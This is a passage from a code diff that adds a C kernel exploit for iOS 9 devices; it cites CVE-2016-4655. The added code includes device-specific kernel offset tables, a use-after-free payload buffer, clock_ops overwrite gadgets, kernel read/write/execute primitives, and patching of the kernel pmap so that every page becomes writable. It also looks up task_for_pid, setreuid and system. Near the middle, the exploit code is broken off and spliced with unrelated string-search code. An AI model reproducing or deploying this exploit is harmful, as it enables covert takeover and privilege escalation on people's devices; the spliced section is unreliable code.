iPad22_iOS933: return 0x14; + case iPad22_iOS934: return 0x14; + case iPad23_iOS910: return 0x16; + case iPad23_iOS920: return 0x14; + case iPad23_iOS921: return 0x14; + case iPad23_iOS930: return 0x14; + case iPad23_iOS931: return 0x14; + case iPad23_iOS932: return 0x14; + case iPad23_iOS933: return 0x14; + case iPad23_iOS934: return 0x14; + case iPad24_iOS910: return 0x16; + case iPad24_iOS920: return 0x14; + case iPad24_iOS921: return 0x14; + case iPad24_iOS930: return 0x14; + case iPad24_iOS931: return 0x14; + case iPad24_iOS932: return 0x14; + case iPad24_iOS933: return 0x14; + case iPad24_iOS934: return 0x14; + case iPad25_iOS902: return 0x16; + case iPad31_iOS910: return 0x16; + case iPad31_iOS920: return 0x14; + case iPad31_iOS921: return 0x14; + case iPad31_iOS930: return 0x14; + case iPad31_iOS931: return 0x14; + case iPad31_iOS932: return 0x14; + case iPad31_iOS933: return 0x14; + case iPad31_iOS934: return 0x14; + case iPad32_iOS910: return 0x16; + case iPad32_iOS920: return 0x14; + case iPad32_iOS921: return 0x14; + case iPad32_iOS930: return 0x14; + case iPad32_iOS931: return 0x14; + case iPad32_iOS932: return 0x14; + case iPad32_iOS933: return 0x14; + case iPad32_iOS934: return 0x14; + case iPad33_iOS902: return 0x16; + case iPad33_iOS910: return 0x16; + case iPad33_iOS920: return 0x14; + case iPad33_iOS921: return 0x14; + case iPad33_iOS930: return 0x14; + case iPad33_iOS931: return 0x14; + case iPad33_iOS932: return 0x14; + case iPad33_iOS933: return 0x14; + case iPad33_iOS934: return 0x14; + case iPad34_iOS910: return 0x16; + case iPad34_iOS920: return 0x14; + case iPad34_iOS921: return 0x14; + case iPad34_iOS930: return 0x14; + case iPad34_iOS931: return 0x14; + case iPad34_iOS932: return 0x14; + case iPad34_iOS933: return 0x14; + case iPad34_iOS934: return 0x14; + case iPad35_iOS910: return 0x16; + case iPad35_iOS920: return 0x14; + case iPad35_iOS921: return 0x14; + case iPad35_iOS930: return 0x14; + case iPad35_iOS931: return 0x14; + case iPad35_iOS932: return 0x14; + case iPad35_iOS933: return 0x14; + case iPad35_iOS934: return 0x14; + case iPad36_iOS910: return 0x16; + case iPad36_iOS920: return 0x14; + case iPad36_iOS921: return 0x14; + case iPad36_iOS930: return 0x14; + case iPad36_iOS931: return 0x14; + case iPad36_iOS932: return 0x14; + case iPad36_iOS933: return 0x14; + case iPad36_iOS934: return 0x14; + case iPod51_iOS910: return 0x16; + case iPod51_iOS920: return 0x14; + case iPod51_iOS921: return 0x14; + case iPod51_iOS930: return 0x14; + case iPod51_iOS931: return 0x14; + case iPod51_iOS932: return 0x14; + case iPod51_iOS933: return 0x14; + case iPod51_iOS934: return 0x14; + default: return 0; + } +} + +static inline unsigned int find_posix_check(void) { + switch (target_environment) { + case iPhone41_iOS902: return 0x40; + case iPhone41_iOS910: return 0x3e; + case iPhone41_iOS920: return 0x3e; + case iPhone41_iOS921: return 0x3e; + case iPhone41_iOS930: return 0x3e; + case iPhone41_iOS931: return 0x3e; + case iPhone41_iOS932: return 0x3e; + case iPhone41_iOS933: return 0x3e; + case iPhone41_iOS934: return 0x3e; + case iPhone51_iOS910: return 0x3e; + case iPhone51_iOS920: return 0x3e; + case iPhone51_iOS921: return 0x3e; + case iPhone51_iOS930: return 0x3e; + case iPhone51_iOS931: return 0x3e; + case iPhone51_iOS932: return 0x3e; + case iPhone51_iOS933: return 0x3e; + case iPhone51_iOS934: return 0x3e; + case iPhone52_iOS902: return 0x40; + case iPhone52_iOS910: return 0x3e; + case iPhone52_iOS920: return 0x3e; + case iPhone52_iOS921: return 0x3e; + case iPhone52_iOS930: return 0x3e; + case iPhone52_iOS931: return 0x3e; + case iPhone52_iOS932: return 0x3e; + case iPhone52_iOS933: return 0x3e; + case iPhone52_iOS934: return 0x3e; + case iPhone53_iOS910: return 0x3e; + case iPhone53_iOS920: return 0x3e; + case iPhone53_iOS921: return 0x3e; + case iPhone53_iOS930: return 0x3e; + case iPhone53_iOS931: return 0x3e; + case iPhone53_iOS932: return 0x3e; + case iPhone53_iOS933: return 0x3e; + case iPhone53_iOS934: return 0x3e; + case iPhone54_iOS910: return 0x3e; + case iPhone54_iOS920: return 0x3e; + case iPhone54_iOS921: return 0x3e; + case iPhone54_iOS930: return 0x3e; + case iPhone54_iOS931: return 0x3e; + case iPhone54_iOS932: return 0x3e; + case iPhone54_iOS933: return 0x3e; + case iPhone54_iOS934: return 0x3e; + case iPad21_iOS910: return 0x40; + case iPad21_iOS920: return 0x3e; + case iPad21_iOS921: return 0x3e; + case iPad21_iOS930: return 0x3e; + case iPad21_iOS931: return 0x3e; + case iPad21_iOS932: return 0x3e; + case iPad21_iOS933: return 0x3e; + case iPad21_iOS934: return 0x3e; + case iPad22_iOS910: return 0x40; + case iPad22_iOS920: return 0x3e; + case iPad22_iOS921: return 0x3e; + case iPad22_iOS930: return 0x3e; + case iPad22_iOS931: return 0x3e; + case iPad22_iOS932: return 0x3e; + case iPad22_iOS933: return 0x3e; + case iPad22_iOS934: return 0x3e; + case iPad23_iOS910: return 0x40; + case iPad23_iOS920: return 0x3e; + case iPad23_iOS921: return 0x3e; + case iPad23_iOS930: return 0x3e; + case iPad23_iOS931: return 0x3e; + case iPad23_iOS932: return 0x3e; + case iPad23_iOS933: return 0x3e; + case iPad23_iOS934: return 0x3e; + case iPad24_iOS910: return 0x40; + case iPad24_iOS920: return 0x3e; + case iPad24_iOS921: return 0x3e; + case iPad24_iOS930: return 0x3e; + case iPad24_iOS931: return 0x3e; + case iPad24_iOS932: return 0x3e; + case iPad24_iOS933: return 0x3e; + case iPad24_iOS934: return 0x3e; + case iPad25_iOS902: return 0x40; + case iPad31_iOS910: return 0x40; + case iPad31_iOS920: return 0x3e; + case iPad31_iOS921: return 0x3e; + case iPad31_iOS930: return 0x3e; + case iPad31_iOS931: return 0x3e; + case iPad31_iOS932: return 0x3e; + case iPad31_iOS933: return 0x3e; + case iPad31_iOS934: return 0x3e; + case iPad32_iOS910: return 0x40; + case iPad32_iOS920: return 0x3e; + case iPad32_iOS921: return 0x3e; + case iPad32_iOS930: return 0x3e; + case iPad32_iOS931: return 0x3e; + case iPad32_iOS932: return 0x3e; + case iPad32_iOS933: return 0x3e; + case iPad32_iOS934: return 0x3e; + case iPad33_iOS902: return 0x40; + case iPad33_iOS910: return 0x40; + case iPad33_iOS920: return 0x3e; + case iPad33_iOS921: return 0x3e; + case iPad33_iOS930: return 0x3e; + case iPad33_iOS931: return 0x3e; + case iPad33_iOS932: return 0x3e; + case iPad33_iOS933: return 0x3e; + case iPad33_iOS934: return 0x3e; + case iPad34_iOS910: return 0x40; + case iPad34_iOS920: return 0x3e; + case iPad34_iOS921: return 0x3e; + case iPad34_iOS930: return 0x3e; + case iPad34_iOS931: return 0x3e; + case iPad34_iOS932: return 0x3e; + case iPad34_iOS933: return 0x3e; + case iPad34_iOS934: return 0x3e; + case iPad35_iOS910: return 0x40; + case iPad35_iOS920: return 0x3e; + case iPad35_iOS921: return 0x3e; + case iPad35_iOS930: return 0x3e; + case iPad35_iOS931: return 0x3e; + case iPad35_iOS932: return 0x3e; + case iPad35_iOS933: return 0x3e; + case iPad35_iOS934: return 0x3e; + case iPad36_iOS910: return 0x40; + case iPad36_iOS920: return 0x3e; + case iPad36_iOS921: return 0x3e; + case iPad36_iOS930: return 0x3e; + case iPad36_iOS931: return 0x3e; + case iPad36_iOS932: return 0x3e; + case iPad36_iOS933: return 0x3e; + case iPad36_iOS934: return 0x3e; + case iPod51_iOS910: return 0x40; + case iPod51_iOS920: return 0x3e; + case iPod51_iOS921: return 0x3e; + case iPod51_iOS930: return 0x3e; + case iPod51_iOS931: return 0x3e; + case iPod51_iOS932: return 0x3e; + case iPod51_iOS933: return 0x3e; + case iPod51_iOS934: return 0x3e; + default: return 0; + } +} + +static inline unsigned int find_mac_proc_check(void) { + switch (target_environment) { + case iPhone41_iOS902: return 0x224; + case iPhone41_iOS910: return 0x224; + case iPhone41_iOS920: return 0x1e6; + case iPhone41_iOS921: return 0x1e6; + case iPhone41_iOS930: return 0x1e6; + case iPhone41_iOS931: return 0x1e6; + case iPhone41_iOS932: return 0x1e6; + case iPhone41_iOS933: return 0x1e6; + case iPhone41_iOS934: return 0x1e6; + case iPhone51_iOS910: return 0x1e6; + case iPhone51_iOS920: return 0x1e6; + case iPhone51_iOS921: return 0x1e6; + case iPhone51_iOS930: return 0x1e6; + case iPhone51_iOS931: return 0x1e6; + case iPhone51_iOS932: return 0x1e6; + case iPhone51_iOS933: return 0x1e6; + case iPhone51_iOS934: return 0x1e6; + case iPhone52_iOS902: return 0x224; + case iPhone52_iOS910: return 0x1e6; + case iPhone52_iOS920: return 0x1e6; + case iPhone52_iOS921: return 0x1e6; + case iPhone52_iOS930: return 0x1e6; + case iPhone52_iOS931: return 0x1e6; + case iPhone52_iOS932: return 0x1e6; + case iPhone52_iOS933: return 0x1e6; + case iPhone52_iOS934: return 0x1e6; + case iPhone53_iOS910: return 0x1e6; + case iPhone53_iOS920: return 0x1e6; + case iPhone53_iOS921: return 0x1e6; + case iPhone53_iOS930: return 0x1e6; + case iPhone53_iOS931: return 0x1e6; + case iPhone53_iOS932: return 0x1e6; + case iPhone53_iOS933: return 0x1e6; + case iPhone53_iOS934: return 0x1e6; + case iPhone54_iOS910: return 0x1e6; + case iPhone54_iOS920: return 0x1e6; + case iPhone54_iOS921: return 0x1e6; + case iPhone54_iOS930: return 0x1e6; + case iPhone54_iOS931: return 0x1e6; + case iPhone54_iOS932: return 0x1e6; + case iPhone54_iOS933: return 0x1e6; + case iPhone54_iOS934: return 0x1e6; + case iPad21_iOS910: return 0x224; + case iPad21_iOS920: return 0x1e6; + case iPad21_iOS921: return 0x1e6; + case iPad21_iOS930: return 0x1e6; + case iPad21_iOS931: return 0x1e6; + case iPad21_iOS932: return 0x1e6; + case iPad21_iOS933: return 0x1e6; + case iPad21_iOS934: return 0x1e6; + case iPad22_iOS910: return 0x224; + case iPad22_iOS920: return 0x1e6; + case iPad22_iOS921: return 0x1e6; + case iPad22_iOS930: return 0x1e6; + case iPad22_iOS931: return 0x1e6; + case iPad22_iOS932: return 0x1e6; + case iPad22_iOS933: return 0x1e6; + case iPad22_iOS934: return 0x1e6; + case iPad23_iOS910: return 0x224; + case iPad23_iOS920: return 0x1e6; + case iPad23_iOS921: return 0x1e6; + case iPad23_iOS930: return 0x1e6; + case iPad23_iOS931: return 0x1e6; + case iPad23_iOS932: return 0x1e6; + case iPad23_iOS933: return 0x1e6; + case iPad23_iOS934: return 0x1e6; + case iPad24_iOS910: return 0x224; + case iPad24_iOS920: return 0x1e6; + case iPad24_iOS921: return 0x1e6; + case iPad24_iOS930: return 0x1e6; + case iPad24_iOS931: return 0x1e6; + case iPad24_iOS932: return 0x1e6; + case iPad24_iOS933: return 0x1e6; + case iPad24_iOS934: return 0x1e6; + case iPad25_iOS902: return 0x224; + case iPad31_iOS910: return 0x224; + case iPad31_iOS920: return 0x1e6; + case iPad31_iOS921: return 0x1e6; + case iPad31_iOS930: return 0x1e6; + case iPad31_iOS931: return 0x1e6; + case iPad31_iOS932: return 0x1e6; + case iPad31_iOS933: return 0x1e6; + case iPad31_iOS934: return 0x1e6; + case iPad32_iOS910: return 0x224; + case iPad32_iOS920: return 0x1e6; + case iPad32_iOS921: return 0x1e6; + case iPad32_iOS930: return 0x1e6; + case iPad32_iOS931: return 0x1e6; + case iPad32_iOS932: return 0x1e6; + case iPad32_iOS933: return 0x1e6; + case iPad32_iOS934: return 0x1e6; + case iPad33_iOS902: return 0x224; + case iPad33_iOS910: return 0x224; + case iPad33_iOS920: return 0x1e6; + case iPad33_iOS921: return 0x1e6; + case iPad33_iOS930: return 0x1e6; + case iPad33_iOS931: return 0x1e6; + case iPad33_iOS932: return 0x1e6; + case iPad33_iOS933: return 0x1e6; + case iPad33_iOS934: return 0x1e6; + case iPad34_iOS910: return 0x224; + case iPad34_iOS920: return 0x1e6; + case iPad34_iOS921: return 0x1e6; + case iPad34_iOS930: return 0x1e6; + case iPad34_iOS931: return 0x1e6; + case iPad34_iOS932: return 0x1e6; + case iPad34_iOS933: return 0x1e6; + case iPad34_iOS934: return 0x1e6; + case iPad35_iOS910: return 0x224; + case iPad35_iOS920: return 0x1e6; + case iPad35_iOS921: return 0x1e6; + case iPad35_iOS930: return 0x1e6; + case iPad35_iOS931: return 0x1e6; + case iPad35_iOS932: return 0x1e6; + case iPad35_iOS933: return 0x1e6; + case iPad35_iOS934: return 0x1e6; + case iPad36_iOS910: return 0x224; + case iPad36_iOS920: return 0x1e6; + case iPad36_iOS921: return 0x1e6; + case iPad36_iOS930: return 0x1e6; + case iPad36_iOS931: return 0x1e6; + case iPad36_iOS932: return 0x1e6; + case iPad36_iOS933: return 0x1e6; + case iPad36_iOS934: return 0x1e6; + case iPod51_iOS910: return 0x224; + case iPod51_iOS920: return 0x1e6; + case iPod51_iOS921: return 0x1e6; + case iPod51_iOS930: return 0x1e6; + case iPod51_iOS931: return 0x1e6; + case iPod51_iOS932: return 0x1e6; + case iPod51_iOS933: return 0x1e6; + case iPod51_iOS934: return 0x1e6; + default: return 0; + } +} +static unsigned char clock_ops_overwrite[] = { + 0x00, 0x00, 0x00, 0x00, // [00] (rtclock.getattr): address of OSSerializer::serialize (+1) + 0x00, 0x00, 0x00, 0x00, // [04] (calend_config): NULL + 0x00, 0x00, 0x00, 0x00, // [08] (calend_init): NULL + 0x00, 0x00, 0x00, 0x00, // [0C] (calend_gettime): address of calend_gettime (+1) + 0x00, 0x00, 0x00, 0x00, // [10] (calend_getattr): address of _bufattr_cpx (+1) +}; + +static unsigned char uaf_payload_buffer[] = { + 0x00, 0x00, 0x00, 0x00, // [00] ptr to clock_ops_overwrite buffer + 0x00, 0x00, 0x00, 0x00, // [04] address of clock_ops array in kern memory + 0x00, 0x00, 0x00, 0x00, // [08] address of _copyin + 0x00, 0x00, 0x00, 0x00, // [0C] NULL + 0x00, 0x00, 0x00, 0x00, // [10] address of OSSerializer::serialize (+1) + 0x00, 0x00, 0x00, 0x00, // [14] address of "BX LR" code fragment + 0x00, 0x00, 0x00, 0x00, // [18] NULL + 0x00, 0x00, 0x00, 0x00, // [1C] address of OSSymbol::getMetaClass (+1) + 0x00, 0x00, 0x00, 0x00, // [20] address of "BX LR" code fragment + 0x00, 0x00, 0x00, 0x00, // [24] address of "BX LR" code fragment +}; + +static unsigned char pExploit[128]; + +#define PAYLOAD_TO_PEXPLOIT (-76) +#define PEXPLOIT_TO_UAF_PAYLOAD 8 + +static vm_offset_t vm_kernel_addrperm; + +static uint32_t write_gadget; // address of "str r1, [r0, #0xc] ; bx lr" + +typedef kern_return_t (*clock_get_attributes_ptr)(clock_t clock_name, clock_flavor_t flavor, clock_attr_t attribute, mach_msg_type_number_t attribute_count); +static clock_get_attributes_ptr clock_get_attributes_func; + +typedef ssize_t (*read_ptr)(int fd, void *buf, size_t count); +static read_ptr read_func; + +typedef ssize_t (*write_ptr)(int fd, const void *buf, size_t count); +static write_ptr write_func; + +void *insert_payload(void *ptr) +{ + void* libsystem = dlopen_func("/usr/lib/libSystem.B.dylib", RTLD_NOW); + +#ifdef DEBUG + typedef int (*asl_log_ptr)(aslclient asl, aslmsg msg, int level, const char *format, ...); + asl_log_ptr asl_log_func = dlsym_func(libsystem, "asl_log"); +#endif + + typedef void* (*memcpy_ptr)( void * destination, const void * source, size_t num); + memcpy_ptr memcpy_func = dlsym_func(libsystem, "memcpy"); + + void* libIOKit = dlopen_func("/System/Library/Frameworks/IOKit.framework/Versions/A/IOKit", RTLD_NOW); + + typedef CFMutableDictionaryRef (*IOServiceMatching_ptr)(const char *name); + IOServiceMatching_ptr IOServiceMatching_func = dlsym_func(libIOKit, "IOServiceMatching"); + + typedef io_service_t (*IOServiceGetMatchingService_ptr)(mach_port_t masterPort, CFDictionaryRef matching); + IOServiceGetMatchingService_ptr IOServiceGetMatchingService_func = dlsym_func(libIOKit, "IOServiceGetMatchingService"); + + typedef mach_port_t (*mach_task_self_ptr)(); + mach_task_self_ptr mach_task_self_func = dlsym_func(libIOKit, "mach_task_self"); + + typedef kern_return_t (*io_service_open_extended_ptr)(mach_port_t service, task_t owningTask, uint32_t connect_type, NDR_record_t ndr, io_buf_ptr_t properties, mach_msg_type_number_t propertiesCnt, kern_return_t *result, mach_port_t *connection); + io_service_open_extended_ptr io_service_open_extended_func = dlsym_func(libIOKit, "io_service_open_extended"); + + typedef kern_return_t (*IORegistryEntryGetChildIterator_ptr)(io_registry_entry_t entry, const io_name_t plane, io_iterator_t *iterator); + IORegistryEntryGetChildIterator_ptr IORegistryEntryGetChildIterator_func = dlsym_func(libIOKit, "IORegistryEntryGetChildIterator"); + + typedef kern_return_t (*IOObjectRelease_ptr)(io_object_t object); + IOObjectRelease_ptr IOObjectRelease_func = dlsym_func(libIOKit, "IOObjectRelease"); + + typedef io_object_t (*IOIteratorNext_ptr)(io_iterator_t iterator); + IOIteratorNext_ptr IOIteratorNext_func = dlsym_func(libIOKit, "IOIteratorNext"); + + typedef kern_return_t (*IORegistryEntryGetProperty_ptr)(io_registry_entry_t entry, const io_name_t propertyName, io_struct_inband_t buffer, uint32_t *size); + IORegistryEntryGetProperty_ptr IORegistryEntryGetProperty_func = dlsym_func(libIOKit, "IORegistryEntryGetProperty"); + + char stackAnchor; + uint32_t bufpos; // unsigned int size; + char buffer[4096]; + int v26; + mach_port_t connection; + kern_return_t result; + + char *p = (char *)((unsigned int)&stackAnchor & 0xFFFFF000); + // kauth_filesec.fsec_magic + *(uint32_t *)(p + 0xEC0) = 0x12CC16D; + // kauth_filesec.fsec_acl.entrycount = KAUTH_FILESEC_NOACL + *(uint32_t *)(p + 0xEE4) = -1; + // kauth_filesec.fsec_acl.acl_ace[...] + memcpy_func((void *)(((unsigned int)&stackAnchor & 0xFFFFF000) | 0xEEC), pExploit, 128); + + memcpy_func(buffer, kOSSerializeBinarySignature, sizeof(kOSSerializeBinarySignature)); + bufpos = sizeof(kOSSerializeBinarySignature); + + WRITE_IN(buffer, kOSSerializeDictionary | kOSSerializeEndCollecton | 2); + + WRITE_IN(buffer, kOSSerializeSymbol | 128); + // "ararararararararararararararararararararararararararararararararararararararararararararararararararararararararararararararara" + for (v26=0; v26<124; v26+=4) { + WRITE_IN(buffer, 0x72617261); + } + WRITE_IN(buffer, 0x00617261); + WRITE_IN(buffer, kOSSerializeNumber | 2048); + WRITE_IN(buffer, 0x00000004); + WRITE_IN(buffer, 0X00000000); + + WRITE_IN(buffer, kOSSerializeSymbol | 30); + WRITE_IN(buffer, 0x4b444948); // "HIDKeyboardModifierMappingDst" + WRITE_IN(buffer, 0x6f627965); + WRITE_IN(buffer, 0x4d647261); + WRITE_IN(buffer, 0x6669646f); + WRITE_IN(buffer, 0x4d726569); + WRITE_IN(buffer, 0x69707061); + WRITE_IN(buffer, 0x7344676e); + WRITE_IN(buffer, 0x00000074); + WRITE_IN(buffer, kOSSerializeNumber | kOSSerializeEndCollecton | 32); + WRITE_IN(buffer, 0x00000193); + WRITE_IN(buffer, 0x00000000); + + io_service_t service = IOServiceGetMatchingService_func(0, IOServiceMatching_func("AppleKeyStore")); + + NDR_record_t* NDR_record_lookup = dlsym_func(libIOKit, "NDR_record"); + io_service_open_extended_func(service, mach_task_self_func(), 0, *NDR_record_lookup, buffer, bufpos, &result, &connection); + if (result != KERN_SUCCESS) { + /*asl_log_func(0, 0, ASL_LEVEL_ERR, "error!\n");*/ + } + + io_object_t object = 0; + uint32_t size = sizeof(buffer); + io_iterator_t iterator; + IORegistryEntryGetChildIterator_func(service, "IOService", &iterator); + uint32_t *args = (uint32_t *)ptr; + uint32_t kernel_base = *args; + uint32_t payload_ptr = 0; + + do { + if (object) { + IOObjectRelease_func(object); + } + object = IOIteratorNext_func(iterator); + } while (IORegistryEntryGetProperty_func(object, "ararararararararararararararararararararararararararararararararararararararararararararararararararararararararararararararara", buffer, &size)); + + if (size > 8) { + payload_ptr = *(uint32_t *)(buffer+16); + } + + *(uint32_t *)clock_ops_overwrite = kernel_base + find_OSSerializer_serialize() + 1; + *(uint32_t *)(clock_ops_overwrite+0xC) = kernel_base + find_calend_gettime() + 1; + *(uint32_t *)(clock_ops_overwrite+0x10) = kernel_base + find_bufattr_cpx() + 1; + + *(uint32_t *)uaf_payload_buffer = (uint32_t)clock_ops_overwrite; + *(uint32_t *)(uaf_payload_buffer+0x4) = kernel_base + find_clock_ops(); + *(uint32_t *)(uaf_payload_buffer+0x8) = kernel_base + find_copyin(); + *(uint32_t *)(uaf_payload_buffer+0x10) = kernel_base + find_OSSerializer_serialize() + 1; + *(uint32_t *)(uaf_payload_buffer+0x14) = kernel_base + find_bx_lr(); + *(uint32_t *)(uaf_payload_buffer+0x1C) = kernel_base + find_OSSymbol_getMetaClass() + 1; + *(uint32_t *)(uaf_payload_buffer+0x20) = kernel_base + find_bx_lr(); + *(uint32_t *)(uaf_payload_buffer+0x24) = kernel_base + find_bx_lr(); + + memcpy_func(pExploit+PEXPLOIT_TO_UAF_PAYLOAD, uaf_payload_buffer, sizeof(uaf_payload_buffer)); + memcpy_func(pExploit+PEXPLOIT_TO_UAF_PAYLOAD+sizeof(uaf_payload_buffer), clock_ops_overwrite, sizeof(clock_ops_overwrite)); + + // kauth_filesec.fsec_acl.acl_ace[...] + memcpy_func((void *)(((unsigned int)&stackAnchor & 0xFFFFF000) | 0xEEC), pExploit, 128); + + *(uint32_t *)(args[1]) = payload_ptr; + + asm_syscall(SYS_open_extended, (long)lockfile, O_WRONLY | O_EXLOCK, KAUTH_UID_NONE, KAUTH_GID_NONE, 0644, (long)(p + 0xEC0)); + return NULL; + +} + + +uint32_t read_primitive(uint32_t addr) { + int attr; + unsigned int attrCnt; + + return clock_get_attributes_func(clk_battery, addr, &attr, &attrCnt); +} + +void exec_primitive(uint32_t fct, uint32_t arg1, uint32_t arg2) { + int attr; + unsigned int attrCnt; + char data[64]; + + write_func(fildes[1], "AAAABBBB", 8); + write_func(fildes[1], &arg1, 4); + write_func(fildes[1], &arg2, 4); + write_func(fildes[1], &fct, 4); + clock_get_attributes_func(clk_realtime, pipebuf, &attr, &attrCnt); + + read_func(fildes[0], data, 64); +} + +void write_primitive(uint32_t addr, uint32_t value) { + addr -= 0xc; + exec_primitive(write_gadget, addr, value); +} + +void patch_kernel_pmap(uint32_t kernel_base) { + uint32_t kernel_pmap = find_kernel_pmap() + kernel_base; + uint32_t kernel_pmap_store = read_primitive(kernel_pmap); + uint32_t tte_virt = read_primitive(kernel_pmap_store); + uint32_t tte_phys = read_primitive(kernel_pmap_store+4); + + /*printf("kernel pmap store @ 0x%08x\n", kernel_pmap_store);*/ + /*printf("kernel pmap tte is at VA 0x%08x PA 0x%08x\n", tte_virt, tte_phys);*/ + + /* every page is writable */ + uint32_t i; + uint32_t j; + for (i=0; i= nlen) + { + /* scan from the end of the needle */ + for (scan = last; haystack[scan] == needle[scan]; scan = scan - 1) + if (scan == 0) /* If the first byte matches, we've found it. */ + return (void *)haystack; + + /* otherwise, we need to skip some bytes and start again. + Note that here we are getting the skip value based on the last byte + of needle, no matter where we didn't match. So if needle is: "abcd" + then we are skipping based on 'd' and that value will be 4, and + for "abcdd" we again skip on 'd' but the value will be only 1. + The alternative of pretending that the mismatched character was + the last character is slower in the normal case (E.g. finding + "abcd" in "...azcd..." gives 4 by using 'd' but only + 4-2==2 using 'z'. */ + hlen -= bad_char_skip[haystack[last]]; + haystack += bad_char_skip[haystack[last]]; + } + + return NULL; +} + +void init_exploit(void * dlsym_addr, void * dlopen_addr) +{ + dlopen_func = dlopen_addr; + dlsym_func = dlsym_addr; + + // Lookup functions + void* libsystem = dlopen_func("/usr/lib/libSystem.B.dylib", RTLD_NOW); + +#ifdef DEBUG + typedef int (*asl_log_ptr)(aslclient asl, aslmsg msg, int level, const char *format, ...); + asl_log_ptr asl_log_func = dlsym_func(libsystem, "asl_log"); +#endif + + typedef void* (*memcpy_ptr)( void * destination, const void * source, size_t num); + memcpy_ptr memcpy_func = dlsym_func(libsystem, "memcpy"); + + void* libIOKit = dlopen_func("/System/Library/Frameworks/IOKit.framework/Versions/A/IOKit", RTLD_NOW); + + typedef CFMutableDictionaryRef (*IOServiceMatching_ptr)(const char *name); + IOServiceMatching_ptr IOServiceMatching_func = dlsym_func(libIOKit, "IOServiceMatching"); + + typedef io_service_t (*IOServiceGetMatchingService_ptr)(mach_port_t masterPort, CFDictionaryRef matching); + IOServiceGetMatchingService_ptr IOServiceGetMatchingService_func = dlsym_func(libIOKit, "IOServiceGetMatchingService"); + + typedef mach_port_t (*mach_task_self_ptr)(); + mach_task_self_ptr mach_task_self_func = dlsym_func(libIOKit, "mach_task_self"); + + typedef kern_return_t (*io_service_open_extended_ptr)(mach_port_t service, task_t owningTask, uint32_t connect_type, NDR_record_t ndr, io_buf_ptr_t properties, mach_msg_type_number_t propertiesCnt, kern_return_t *result, mach_port_t *connection); + io_service_open_extended_ptr io_service_open_extended_func = dlsym_func(libIOKit, "io_service_open_extended"); + + typedef kern_return_t (*IORegistryEntryGetChildIterator_ptr)(io_registry_entry_t entry, const io_name_t plane, io_iterator_t *iterator); + IORegistryEntryGetChildIterator_ptr IORegistryEntryGetChildIterator_func = dlsym_func(libIOKit, "IORegistryEntryGetChildIterator"); + + typedef kern_return_t (*IOObjectRelease_ptr)(io_object_t object); + IOObjectRelease_ptr IOObjectRelease_func = dlsym_func(libIOKit, "IOObjectRelease"); + + typedef io_object_t (*IOIteratorNext_ptr)(io_iterator_t iterator); + IOIteratorNext_ptr IOIteratorNext_func = dlsym_func(libIOKit, "IOIteratorNext"); + + typedef kern_return_t (*IORegistryEntryGetProperty_ptr)(io_registry_entry_t entry, const io_name_t propertyName, io_struct_inband_t buffer, uint32_t *size); + IORegistryEntryGetProperty_ptr IORegistryEntryGetProperty_func = dlsym_func(libIOKit, "IORegistryEntryGetProperty"); + + clock_get_attributes_func = dlsym_func(libsystem, "clock_get_attributes"); + read_func = dlsym_func(libsystem, "read"); + write_func = dlsym_func(libsystem, "write"); + + DLSYM_FUNC(malloc, libsystem, void*, size_t) + DLSYM_FUNC(free, libsystem, void*) + DLSYM_FUNC(getenv, libsystem, char*, const char*) + DLSYM_FUNC(strcpy, libsystem, char*, char*, const char*) + DLSYM_FUNC(strcat, libsystem, char*, char*, const char*) + DLSYM_FUNC(strlen, libsystem, size_t, const char*) + DLSYM_FUNC(open, libsystem, int, const char*, int flags, mode_t mode) + DLSYM_FUNC(flock, libsystem, int, int fd, int operation) + DLSYM_FUNC(pipe, libsystem, int, int* pipefd) + DLSYM_FUNC(mach_host_self, libsystem, host_name_port_t) + DLSYM_FUNC(host_get_clock_service, libsystem, kern_return_t, host_t host, clock_id_t id, clock_t clock_name) + DLSYM_FUNC(host_get_io_master, libsystem, kern_return_t, host_t host, io_master_t *io_master) + DLSYM_FUNC(io_service_get_matching_services_bin, libIOKit, kern_return_t, mach_port_t, char*, int, void*) + + DLSYM_FUNC(pthread_create, libsystem, int, pthread_t *thread, const pthread_attr_t *attr, void *(*start_routine) (void *), void *arg); + DLSYM_FUNC(sleep, libsystem, unsigned int, unsigned int); + DLSYM_FUNC(fstat, libsystem, int, int fildes, struct stat *buf); + DLSYM_FUNC(setreuid, libsystem, int, uid_t ruid, uid_t euid); + DLSYM_FUNC(getuid, libsystem, uid_t); + + DLSYM_FUNC(posix_spawn, libsystem, int, pid_t *pid, const char *path, const posix_spawn_file_actions_t *file_actions, const posix_spawnattr_t *attrp, char *const argv[], char *const envp[]); + DLSYM_FUNC(system, libsystem, int, char*); + DLSYM_FUNC(waitpid, libsystem, pid_t, pid_t pid, int *status, int options); + + DLSYM_FUNC(task_for_pid, libsystem, kern_return_t, mach_port_name_t target_tport, int pid, mach_port_name_t *t); + DLSYM_FUNC(vm_write, libsystem, kern_return_t, vm_map_t target_task, vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt); + DLSYM_FUNC(vm_read_overwrite, libsystem, kern_return_t, vm_map_t target_task, vm_address_t address, vm_size_t size, vm_address_t data, vm_size_t *outsize); + + + + // Init + /*// TODO fix*/ + target_environment = info_to_target_environment("iPhone5,3", "9.3.2"); + + const char *lock_last_path_component = "/tmp/lock"; + char *home = getenv_func("HOME"); + + size_t locklen = strlen_func(home) + strlen_func(lock_last_path_component) + 1; + lockfile = malloc_func(locklen); + strcpy_func(lockfile, home); + strcat_func(lockfile, lock_last_path_component); + + fd = open_func(lockfile, O_CREAT | O_WRONLY, 0644); + + flock_func(fd, LOCK_EX); + pipe_func(fildes); + + kern_return_t kr; + kr = host_get_clock_service_func(mach_host_self_func(), CALENDAR_CLOCK, &clk_battery); + /*if (kr != KERN_SUCCESS) {*/ + /*printf("err: %d\n", err_get_code(kr));*/ + /*}*/ + + kr = host_get_clock_service_func(mach_host_self_func(), REALTIME_CLOCK, &clk_realtime); + /*if (kr != KERN_SUCCESS) {*/ + /*printf("err: %d\n", err_get_code(kr));*/ + /*}*/ + + // CVE-2016-4655 + char data[4096]; + uint32_t bufpos = 0; + + memcpy_func(data, kOSSerializeBinarySignature, sizeof(kOSSerializeBinarySignature)); + bufpos += sizeof(kOSSerializeBinarySignature); + + WRITE_IN(data, kOSSerializeDictionary | kOSSerializeEndCollecton | 2); + + WRITE_IN(data, kOSSerializeSymbol | 30); + WRITE_IN(data, 0x4b444948); // "HIDKeyboardModifierMappingSrc" + WRITE_IN(data, 0x6f627965); + WRITE_IN(data, 0x4d647261); + WRITE_IN(data, 0x6669646f); + WRITE_IN(data, 0x4d726569); + WRITE_IN(data, 0x69707061); + WRITE_IN(data, 0x7253676e); + WRITE_IN(data, 0x00000063); + WRITE_IN(data, 